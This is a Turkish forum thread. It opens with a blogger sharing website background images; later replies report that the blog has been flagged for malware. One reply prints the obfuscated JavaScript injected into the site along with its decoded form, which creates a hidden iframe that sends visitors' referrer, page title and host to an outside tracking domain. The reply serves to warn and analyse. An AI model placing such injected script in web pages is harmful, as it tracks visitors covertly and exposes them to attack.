• 22-07-2014, 23:01:16
    #1

    Alıntı
    Yine on numara bir yazı ile blogonur karşısınızda! Tamam tamam, ara sıra denk gelen güzel yazılarıyla blogonur.

    Hepsini tek tek koydum, kıllık olsun diye Eğer üye olup giriş yaparsanız hepsini .rar halinde toplu olarak indirebileceğiniz yandex.disk linkini görebileceksiniz. Şirinleri bile görebileceksiniz!


































    Arkadaşlar bir sürü arkaplan var, 58 tanesinide buraya koyamam. Hepsini toplu olarak indirmek isterseniz blog üyesi olarak linkleri görebilirsiniz.

    Kaynak: Blogonur - Sıradan blog.
    Not: Görselleri yabancı sitelerden topladım, fakat telif hakkı gibi bir sorunları yoktur görsellerin rahatlıkla kullanabilirsiniz.
  • 22-07-2014, 23:05:25
    #2
    Kimlik doğrulama veya yönetimden onay bekliyor.
    sağol süpersin.
  • 05-10-2015, 12:33:16
    #3
    Üyeliği durduruldu
    güzel farklı arka planlar. beğendim. gözü yormuyorlar
  • 05-10-2015, 12:36:50
    #4
    Web sitene girmeye çalıştığımda bu yazı çıkıyor hocam haberin olsun

    Gideceğiniz site kötü amaçlı yazılım içeriyor

    Şu anda djvdfv09dfjv0dfvcdv.ml sitesinde bulunan saldırganlar, bilgilerinizi (örneğin fotoğraflar, şifreler, mesajlar ve kredi kartları) çalacak veya silecek tehlikeli programları bilgisayarınıza yüklemeyi deneyebilirler.
    Olası güvenlik olaylarının ayrıntılarını Google'a otomatik olarak bildirin. Gizlilik politikası
  • 05-10-2015, 12:47:59
    #5
    güven diyip girdim girmez olaydım.
    http://www.imgim.com/7623incil2641581.png

    https://www.virustotal.com/tr/url/94...is/1444038239/
    https://sitecheck.sucuri.net/results...attern-arsivi/

    Alan Adını Kayıt firmasına şikayet ettim ama daha önceden benden önce etmişler Alan Adı'nın NS adresleri halen ns1.illuminationes.com şeklinde park haline almamışlar. Resmen çin'liler kendi saldırganlarını koruyor yuh



    Sitedeki Crypted JS

        var a = "'1Aqapkrv'02v{rg'1F'00vgzv-hctcqapkrv'00'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02'00ida,'00'02)'02'00k,k'00'02)'02'00nn'00'02)'02'00woklcv'00'02)'02'00kmlg'00'02)'02'00q,a'00'02)'02'00mo'00'02)'02'00-qlkvaj'1Df'00'02)'02'00gd'00'02)'02'00cwn'00'02)'02'00v]i'00'02)'02'00g{'00'02)'02'00umpf'1F'00'02)'02fgdcwnv]ig{umpf'02)'02'00'04pgdg'00'02)'02'00ppgp'1F'00'02)'02pgdgpgp'02)'02'00'04qg]p'00'02)'02'00gd'00'02)'02'00gp'00'02)'02'00pgp'1F'00'02)'02pgdgpgp'02)'02'00'04qmw'00'02)'02'00pag'1F'00'02)'02jmqv'1@'2C'2;fmawoglv,`mf{,crrglfAjknf'0:kdpcog'0;'1@'2C'1A-qapkrv'1G";
        b = "";
        c = "";
        var clen;
        clen = a.length;
        for (i = 0; i < clen; i++) {
            b += String.fromCharCode(a.charCodeAt(i) ^ 2)
        }
        c = unescape(b);
        document.alert(c);
    Decode edersek
        var referer = encodeURIComponent(document.referrer);
        var default_keyword = encodeURIComponent(document.title);
        var host = encodeURIComponent(location.host);
        var iframe = document.createElement('iframe');
        iframe.width = 0;
        iframe.height = 0;
        iframe.src = "http://kfc.i.illuminationes.com/snitch?default_keyword=" + default_keyword + "&referrer=" + referer + "&se_referrer=" + referer + "&source=" + host;
        document.body.appendChild(iframe);
    Alan Adı ve IP'si bir çok firma tarafından Kara liste de olmasına rağmen Aktif NS adreslerini engellenmişler. Siteye girenler Antivirüs programları ile taratsın bilgisayarlarını!
  • 05-10-2015, 13:01:30
    #6
    Arkadaşın sitesine virüs girmiş sanırım. Bende de kötü yazılım uyarısı verdi.
  • 05-10-2015, 13:04:08
    #7
    http://subtlepatterns.com/